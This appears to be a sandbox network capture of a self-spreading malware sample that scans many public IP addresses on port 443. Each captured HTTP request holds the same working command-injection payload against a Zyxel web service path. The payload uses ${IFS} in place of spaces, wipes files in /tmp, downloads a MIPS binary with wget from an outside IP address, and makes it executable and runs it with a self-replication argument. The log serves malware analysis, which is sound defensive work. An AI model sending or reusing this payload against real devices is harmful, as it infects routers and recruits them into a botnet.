                                                  Jan 19, 2024 18:23:52.988612890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3707192.168.2.1360650128.21.50.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988673925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3708192.168.2.1346774128.238.131.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988750935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3709192.168.2.1334328100.209.116.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988811016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3710192.168.2.1341282163.143.124.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988886118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3711192.168.2.1338292167.7.50.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988933086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3712192.168.2.135125293.67.74.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988960981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3713192.168.2.133429069.132.139.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.988998890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3714192.168.2.135991846.171.208.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989067078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3715192.168.2.1348732167.218.44.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989110947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3716192.168.2.1333224156.47.130.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989145041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3717192.168.2.1342380134.202.42.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989227057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3718192.168.2.1334956147.161.115.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989279032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3719192.168.2.134761294.218.166.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989336967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3720192.168.2.1350422209.190.162.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989367008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3721192.168.2.1342170217.0.65.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989424944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3722192.168.2.1354222149.206.88.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989470005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3723192.168.2.135156841.191.184.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989510059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3724192.168.2.135972086.175.213.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989542007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3725192.168.2.1345074134.233.159.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989600897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3726192.168.2.1343352149.76.151.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989650965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3727192.168.2.1351614123.227.150.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989717007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3728192.168.2.1347162109.230.110.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989749908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3729192.168.2.1355776186.240.63.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989810944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3730192.168.2.135540467.67.107.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989841938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3731192.168.2.135050657.2.190.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989902973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3732192.168.2.135110064.246.123.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.989937067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3733192.168.2.1358084190.248.80.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990048885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3734192.168.2.1349502141.9.187.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990088940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3735192.168.2.133696834.8.62.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990142107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3736192.168.2.1358242184.86.124.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990192890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3737192.168.2.1334550176.174.134.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990252972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3738192.168.2.135810275.135.174.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990305901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3739192.168.2.1335556181.67.15.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990372896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3740192.168.2.135361676.63.137.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990417004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3741192.168.2.133420852.123.130.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990444899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3742192.168.2.1345426217.218.175.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990504980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3743192.168.2.135827268.22.3.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990571022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3744192.168.2.135993025.137.231.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990608931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3745192.168.2.13403568.212.161.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990662098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3746192.168.2.135348246.141.130.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990722895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3747192.168.2.1356342116.234.162.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990765095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3748192.168.2.1336738201.200.168.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990850925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3749192.168.2.1340806107.36.118.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990904093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3750192.168.2.1351414219.57.182.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.990966082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3751192.168.2.1345830161.84.170.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991017103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3752192.168.2.1336780112.242.73.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991077900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3753192.168.2.134574869.251.119.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991142035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3754192.168.2.133420643.160.248.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991178036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3755192.168.2.1345166181.78.23.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991251945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3756192.168.2.1346232188.148.210.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991301060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3757192.168.2.133986097.32.153.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991355896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3758192.168.2.1348482170.65.153.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991422892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3759192.168.2.1336912222.196.240.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991492033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3760192.168.2.133718627.117.28.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991552114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3761192.168.2.1338504176.145.69.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991604090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3762192.168.2.1355738184.137.39.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991657972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3763192.168.2.1349210137.131.155.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991707087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3764192.168.2.134272438.32.80.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991756916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3765192.168.2.1358856195.95.18.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991811037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3766192.168.2.134111871.28.220.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991868019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3767192.168.2.1342340221.245.196.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991910934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3768192.168.2.1349108163.104.193.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.991966963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3769192.168.2.1333358145.81.95.53443
                                                  TimestampBytes transferredDirectionData
